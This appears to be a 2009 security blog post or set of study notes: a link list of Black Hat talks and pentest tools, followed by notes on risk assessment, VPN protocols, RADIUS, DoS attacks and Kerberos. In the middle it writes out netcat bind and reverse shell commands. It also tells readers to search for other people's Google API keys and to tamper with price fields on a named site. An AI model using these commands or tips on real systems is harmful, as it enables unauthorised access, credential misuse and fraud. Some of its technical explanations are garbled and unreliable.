It was a pleasure attending InfoSec Europe 2009, this year as a guest and not having to man a booth.
1) Dan Kaminsky Inducted to the Infosec Hall of fame + pushing for DNSSec
2) Whitefield Deffie on the Third age of Information Security ( or maybe the end of Information Security)
3) The e-crime Panel was a Fiasco.
Hi All,
I’ve complied a list of interesting articles and tools you might be interested in checking out. I’ve added some web application testing software as well as Dictionary Files + Pen testing tools.
Web Application Security
Dissecting Web Attacks
http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf
http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Web-Attack-Disection-slides.pdf
New Techniques for Defeating SSL/TLS
https://media.blackhat.com/bh-dc-09/video/Marlinspike/blackhat-dc-09-marlinspike-slide.mov
http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
XSS Anonymous Browser
http://www.blackhat.com/presentations/bh-dc-09/Flick/BlackHat-DC-09-Flick-XAB_Slides.pdf
http://www.blackhat.com/presentations/bh-dc-09/Flick/BlackHat-DC-09-Flick-XAB-wp.pdf
OWASP Linux Distro&Virtual Machine:
http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project
OWASP Running An ISO In Vmware
http://securitydistro.com/video-tutorials/53/Running-an-ISO-on-VMware.php
Acunetix WVS
http://www.acunetix.com/
WebScarab
http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
SPIKE Proxy : HTTP Hacking
http://www.immunitysec.com/resources-freesoftware.shtml
Rootkits + Pentesting
http://sectools.org/crackers.html
http://www.offensive-security.com/cons/shmoo2008/muts_at_shmoo.html
Fast-Track
http://www.thepentest.com/
http://www.shmoocon.org/slides/DKENNEDY_FastTrack_ShmooCon_2009.pdf
Wordlists/Dictionary Files:
http://www.outpost9.com/files/WordLists.html
ftp://ftp.ox.ac.uk/pub/wordlists/
ftp://ftp.mirrorgeek.com/openwall/wordlists
Alice in User-Land: Hijacking the Linux Kernel via /dev/mem
http://www.blackhat.com/presentations/bh-europe-09/Lineberry/BlackHat-Europe-2009-Lineberry-code-injection-via-dev-mem-slides.pdf
.NET Framework Rootkits: Backdoors Inside Your Framework
http://www.blackhat.com/presentations/bh-europe-09/Metula/BlackHat-Europe-2009-Metula-NET-Framework-rootkits-whitepaper.pdf
iRK – Crafting OS X Kernel Rootkits
https://www.blackhat.com/presentations/bh-usa-08/D’Auganno/D’Auganno_Extras.zip
https://www.blackhat.com/presentations/bh-usa-08/D’Auganno/BH_US_08_DAuganno_iRK_OS_X_Rootkits.pdf
A New Breed of Rootkit: The System Management Mode (SMM) Rootkit
https://www.blackhat.com/presentations/bh-usa-08/Embleton_Sparks/BH_US_08_Embleton_Sparks_SMM_Rootkits_Slides.pdf
https://media.blackhat.com/bh-usa-08/video/bh-us-08-Embleton/black-hat-usa-08-embleton-smmrootkit-hires.m4v
Nmap: Scanning the Internet
https://www.blackhat.com/presentations/bh-usa-08/Vaskovich/BH_US_08_Vaskovich_Nmap_Scanning_the_Internet.pdf
https://media.blackhat.com/bh-usa-08/video/bh-us-08-Fyodor/black-hat-usa-08-fyodor-nmap.m4v
Meet The Owner Of a Real Hacked Company – Forensic Investigation
https://www.blackhat.com/presentations/bh-usa-08/Shelhart/BH_US_08_Trustwave_Presentation_Shelhart_Meet_Owner.pdf
https://media.blackhat.com/bh-usa-08/video/bh-us-08-Shelhart/black-hat-usa-08-shelhart-hackedcompany-hires.m4v
Dan Kaminsky
Weaponizing Noam Chomsky, or Hacking with Pattern Language
http://www.shmoocon.org/2007/videos/Weaponizing%20Noam%20Chomsky,%20or%20Hacking%20with%20Pattern%20Languages%20-%20Dan%20Kaminsky.mp4
Few important links and information
The free version of netstalker is now in the lab.
Webgoat is a vunerable server created and maintained by OWASP, it contains the latest vunerabilites, which Security proffesionals could try out. The link below, contains walkthroughs of these vunerabilities and challenges:
http://yehg.org/lab/pr0js/training/webgoat.php
The difference between a bind shell and a reverse bind shell:
Ever notice in the metasploit framework there are two types of payloads (bind/normal and reverse?)
you can bind an application to a particular port. for example : nc -lvvp 666 -e cmd.exe
This command indicates that the cmd is not binded to the port 666. anyone connecting to port 666 will get the cmd output
On the other hand if you are behind a nat it becomes a problem (and thats where reverse bind shell comes in)
First let nnetcat listen on a particular pot: nc -lvvp 666
and conect to it this port, but “throw” the cmd comand shell to it: nc -v “ip address ” 666 -e cmd.exe
As it is an outbound connection it will go through the NAT
What happens here is basically what happens during a client side attack a hacker sends a reverse shell to his listening server from the target machine. How he does that is another question, he can send trojans, worms, BO-exploits. It is essentially a backdoor type payload. Some reverse shells even use IE (the passive x payload) so it as if you are surfing the web.
Web sanning. Some tools like wikito can scan you site against all the google hacks db, for that you need a google API key….if you are lazy you can find that out through google. simple put “google.license_key” into google and you can find someone’s API key.
there are many sites such as langalaxy which do not have proper input validation so tools such as tamperdata for firefox or brup proxy and manipulate the price (and other) fields in order to change the value on the server.
XSS or cross side scripting is a pain of a vunerability. essentially the concept is very simple. If a webserver can accept javascript or other mobile code it can run scripts at the client. it can be inputed in a URL or in any field in a site for example:
http://yehg.org/lab/pr0js/files.php/webgoat_xsslab_stage1.zip
Risk assessment, “Assess The harm that is likely to result from a significant breach of information security and its potential consequences on significant breaches, and the realistic likelihood of a breach in light of prevailing threats vulnerabilities and controls”. ISO-17799 Standard
Information security risk is a threat and a vulnerability to an asset.
An asset can be people or machinery or information and they are given a value.
Those values are enhanced by either the threat or vulnerability. An Asset is something of value, it can be tangible or intangible, it can be a resource it can be a process (a way of doing something) it can be
a product or it can be a system it can be may other things.
A threat is a natural or man made circumstance, that is any potential cause of an
unwanted incident that causes harm or consequential loss to a system or
an organization. It is the cause of an incident, and vulnerability is a weakness
in a safeguard or a control. This is where Risk assessment comes into information security.
Vulnerability is the absence or a weakness of a safeguard
or a control of an asset or a group of assets that may be exploited by
a threat.
Scope
It has to be agreed before hand and if it is not the risk or redundancy and rework is high and the risk threat key risks are missed is also high
The first thing that has to happen in a risk assessment and this actually has to happen to any standard, is to define the scope. The definition of scope is a pre requisite to starting a risk activity/project. setting boundaries is a mandatory part of a process so after the scope,
the organisation identifies the assets and gives them a value. A value can be a value to whichever process they want to undertake,
the whole point of giving values is that one can scale them. Thus an organization
can prioritize them start from the top and work its way down.
So having given values on the impact of failure and the likely hood of the
Threat, assessing the likely hood of a threat which depends on what sort of business is the organisation in. it depends on the industry its in its all very subjective but threats are assessed by how likely the incident is to occur and from that an organization can determine over all risk in terms of priority, how likely is this to happen, then evaluate these controls and are these controls enough?
Residual riskAt the bottom there will always be residual risk. Therefore it is imperative that information security officers objectively assess which risks are left over present their findings and have management sign off on them.
SSL/TLS: is an application independent layer that works between the app and transport layers of the TCP/IP stack SSL/TLS can provide.
1) Authentication of the server to the client from a certification authority
2) Negotiation of a common cryptographic algorithm or cipher
3) Authentication of the client to the server
4) Use of asymmetric encryption to transfer shared
5) Establish an encrypted connection
HTTPS: Web communications that are secured by SSL/TLS are called HTTPS.
SSH: Secure Shell is a low level secure protocol. Its meant to replace telnet, rlogin, rsh and rcp also ssh2 as a replacement for ftp:sftp. It encrypts passwords and other data.
SSH consists of:
1) Transport lyaer protocol (ssh-trans) provides secure authentication,cont, net integrity
2) User authentication protocol (ssh-userAuth) authenticate the client-side user to the server runs over transport layer protocol.
3) The connection protocol (SHH-conn) Multiplexes the encrypted tunnel into several logical channels. It runs over the user authentication protocol.
SSH uses public key encyption as the main metod for a user authentication but rhosts/shosts authentication can be used as well.
SSH provides protection from:
1) packet spoofing
2) IP/Host Spoofing
3) Password Sniffing
4) Eaves dropping
IPSEC: with IPsec you can provide privacy integrity and authenticity for network traffic in the following situations
1) End t end security for IP unicast traffic using IPsec trasport mode
2) Remote Access VPN client and gateway functions, using L2TP secured by IPsec transport mode.
3) Site-to-site VPN connections across outsourced private wide area network (wan) or Internet-based connections using L2TP/IPsec or IPsec Tunnel Mode
3 IKE authentication Methods of IPsec
1) Kerberos v.5
2) Certificates
3) Passwords
IPSec provides integrity protection, authentication and privacy replay protection services for IP traffic:
1) IP protocol 50 called the encapsulating security payload (ESP) format, which provides confidentiality, authenticity, and integrity.
2) IP protocol 51 called authentication header (AH) format, which provides integrity and authenticity, but not confidentity.
IPSec has two modes transport (which uses an existing IP packet) and tunnel mode (which uses an existing IP packet) and Tunnel mode (which uses an IP packet Inside a new IP packet that is sent to a tunnel endpoint in the IPsec format.
Transport mode was designed to provide end to end security while tunnel mode was designed primarily for network mid points, routers, gateways tunnel mode not suitable for vpn (no authentication of client IP address config)
L2TP: L2TP encapsulates PPP frames to be sent over IP, X.25, frame relay or ATM. Its widely implemented by IEFTF (port UDP 1701). It takes advantage of IPsec and encapsulates PPP frames as tunnel data. L2TP was designed for gateway to gateway connection or client to access server.
PPTP: when a PC is connected to the internet a control connection (tunnel) to the server using TCP is established working with PPP
Characteristics of PPTP
1) It’s a layer 2 protocol which encaplsulates PPP frames in IP datagram’s for transmission over an unsecured public IP network such as the internet (Vilates OSI standards)
2) It accomplishes authentication like PPP (PaP, Chap, MSchap)
3) It requires an IP based network. Header compression is not supported. PPTP doesn’t support IPsec and encryption is provided using standard PPP methods.
The Data sent are encapsulated by IP data can be
• TCP port 1723
• Another Datagram
• An IPX message
• A Net BEUI message
VPN: is a secure connection between remote computer and a server on a private network that uses the internet as its medium by having the network permeantly connected to the internet by using a modem to dial-in to an ISP located nearby. Some ISP provides international services so the connection can be made internationally and with only a local call. The remote PC and remote access server establish a secure connection, which protects the data exchanged between them as it travels over the Internet called tunnelling. Some protocols associated with VPNS:
• Point-to-Point Tunneling Protocol: Created by the PPTP industry forum which included Microsoft, 3com ASCend, and ECI Telematics)
• Layer 2 Tunneling Protocol: A combination of PPTP and L2F (designed by CISCO)
• Internet Protocol Security: IPsec is an Architecture, protocol and related internet key exchange (IKE)
Challenge Hand Shake Authentication Protocol is used when a remote client needs to authenticate himself to a network server, or for 2 routers to begin a point-to-point protocol (PPP) session.
CHAP
1. Network Access Server (NAS) sends a challenge (session ID, random string of data)
2. Client uses MD5 to return:
a. Username
b. Encrypted challenge
c. Session ID
d. Password
PAP = Cleartext
SPAP = Shiva incorporates a reversible encryption mechanism
Chap = 3-way hand shake MD5
MS-Chap = MS network domain lgin MD4 hashed password challenge string, session ID
MS-Chap 2 = Larger encryption key size + bidirectional challenge (mutual authentication)
RADIUS: Provide AAA = Authentication Authorization and Accounting services for remote access server. The separation of a remote access server and a RADIUS (USER authentication server) Allows:
The RADIUS Client and Server to support different OS and hardware architecture
The RADIUS client and Server to Be Geographically separated
3) Secure User Accounts by ensuring the accounts are located on servers within the Private network and do not directly exposed to the network
4) Encryption of authentication Client between the radius client and the RADIUS server using IPSEC.
5)Outsourcing of Dial-up remote access to third party organization so the remote access client connectivity provided by RADIUS client allows the remote access users to:
1)Use a variety of authentication protocols chap, MS-chap or clear text authentication
2)Use a variety of encryption algorithms, such as Microsoft point to point encryption (MPPE) or Data Encryption Standard (DES)
3)Connect with a variety of protocol suits such as TCP/IP or IPS/SPX
4)Connect with a variety of technologies such as DSL,ISDN, or Dial-up
Remote user accounting records the following:
1) Length of time user is connected
2) Remote user authentication success or failure
3) Situations when Radius server is unable to authenticate a radius client
The pupose in having Radius clients and servers is to centralize and secure the authentication for remote users. In order to Thwart an attempt to impersinate a radius client, the Admin sets a shared secret during the configuration of radius. Both client/server know it, its never sent over the network the service uses a hashing system to verify the shared secret.
TACACS/+ Provides a way to centrally validate users attempting to gain access to a router or access server. TACAS+ provides a standard Method for managing dissimilar network access servers (NAS) from single set of management services. TACACS+ has three major components:
1) The protocol support within the Access servers and routers.
2) The protocol specification.
3) The centralized security database.
TACAS also has AAA Authentication Authorization Accounting. Forwards many types of username password info (ARA,Slip, PAP, CHAP, KCHAP)
Authorization has a mechanism which tells a access server which access list a user connected to a port uses.
Accounting: TACACs+ Provides Accounting Information to a database through TCP to ensure a more secure and complete accounting log, audit information and billing information.
Distinctions between Radius and TACAS:
1) Radius (UDP) TACAS+ TCP
2) TACACS+ separates authentication and authorization. Radius provides a user profile with auhentication that defines all the user specific parameters.
3) TACACS is typically used only for network devices, such as routers and switches, Radius is used by PC’s and network devices.
DOS/DDOS: They are attacks that consume or disable resources in an attempt to hinder or disrupt some operation or function. There are two types:
1. Flaw exploitation attacks.
2. Flooding attacks, which seek to consume resources.
• Ping of Death: Because several vendor implementations of the IP stack were not designed to handle oversized packet attacks which when combined from a packet over 65,536 bytes most crash or restart using ICMP echo.
• Tear Drop: It is a flaw exploitation attack that involves 2 or more IP fragments that cannot be properly assembled due to improperly configured fragment offset numbers.
• Land: It is a flaw exploitation attack, where the packet has the same source and destination IP addresses as well as port numbers.
• ICMP Flood: Overwhelms a target with ICMP packets till it becomes unresponsive.
• UDP Flood: is like ICMP but uses the UDP protocol by sending many UDP packets to random ports on the targets. The targets respond with either RST or ACK packets depending on how the system is configured the target can reboot, crash or be unresponsive.
• Smurf: is a type of ICMP flood attack, which sends ICMP packets. It makes all systems on the network echo-reply to specific target making it unresponsive or crash.
• Fraggle: is a variation of a smurf attack that uses UDP packets.
Protection against DDOS/DOS
• Egress Filtering: A filter, which drops outgoing packets from the internal subnet, which do not have a source address from that subnet.
• Ingress Filtering: Configures a router to drop external packets with IP sources addresses from internal subnets.
• Disable IP-directed broadcasts: Disable Smurf attacks by configuring the router to drop Packets, which ping broadcast address of an IP subnet.
1. Something a user knows.
2. Something a user has.
3. Something a user is.
Certificates provide the third party trust in a mutual authentication scheme. It is a block of data containing information used to identify a user.
This information includes:
1. Users public key
2. Information about the user
3. Dates from which the certificate is valid
4. Information about the issuer of a certificate
Mutual Authentication is when the user and service validate each other. Kerberos allows this (client becomes validated to service, and vice versa). A Certificate Authority trusted third party could also do that.
Kerberos Authentication: Kerberos is a network authentication protocol that provides strong authentication for client/server applications by using symmetric key cryptography. When a user signs onto the local OS, a local agent (process) sends an authentication request to the Kerberos server. The server responds by sending the encrypted credentials for the user attempting to sign onto the system. The Local agent then tries to decrypt the credentials using the user-supplied password. If the correct password has been supplied, the user is validated and given authentication tickets, which allow the user to access other Kerberos-authenticated services. In addition to the tickets, the user is also given a set of cipher keys that can be used to encrypt all data sessions.
1. Realm: It’s the Organizational boundaries; each realm has an authentication server (AS) & a Ticket Granting Server (TGS). Together the AS and TGS form a key distribution centre (KDC). All services and users in the realm receive tickets from the TGS and are authenticated with the AS.
2. Authentication Server: The AS registers all valid users/services. It provides clients with a ticket granting ticket to the (TGS).
3. Tickets Granting Server: To Minimize the work load of the AS in a Kerberos realm, the TGS grants the session tickets used by client’s to start a session with a service. The clients must use the TGT issued by the AS to request a session ticket from a TGS.
4. Cross-realm authentication: Cross-realm authentication is the capability of users in one realm to be authenticated and access services in another realm. This is accomplished by the user’s realm registering a remote ticket-granting server (RTGS) on the realm of the service. Rather than having each realm authenticate with each other, cross-realm authentication can be configured in a hierarchical fashion.
5. Remote ticket Granting server: The TGS in a user’s realm registers with the remote TGS in order to enable the users access services in remote realms.
6. Ticket: A ticket is a block of data that allows users to prove their identity to a service. Tickets are stored on the local system in a ticket cache and each ticket has a time limit of ten hours time stamp by limiting the time of a ticket minimizes the chances of attackers obtaining a ticket and being able to use it for unauthorized access.
7. Ticket cache: A portion of memory, which stores all of a user’s Kerberos tickets its separate from apps so that several apps can use the same ticket.
8. Ticket-Granting Ticket: A TGT is a ticket that is granted to a valid user by the AS in order to obtain tickets from the TGS, its stored in the ticket cache.
9. Authenticators: A series of bits, a symbol, or a group of symbols that are inserted into a transmission of message in a predetermined manner and are then used for validation. Authenticators are typically valid for 5 minutes.
10. Principal: A Principal is any unique entity to which Kerberos can assign tickets.
Authentication
1. User Logs-on, sends a registration request to AS.
2. AS authenticates user, and provides him with a TGT.
Ticket Granting Server
1. User with TGT requests a ticket from TGS.
2. User Accesses the service using the ticket.
RTGS
1. Client requests a TGT from a remote realm through his TGS and is sent.
2. Using that RTGT the user can contact the RTGS and request a ticket to access the remote service.
MAC/DAC/RBAC
• Discretionary Access Control (DAC): The owner of an object manages access control at his own discretion enforced through ACL’s
• Mandatory Access Control (MAC): Access to an object is restricted based on the sensitivity of the object and granted through authorization to access that level of data.
• Role Based Access Control (RBAC): Access based on the role a user plays in the Organization.
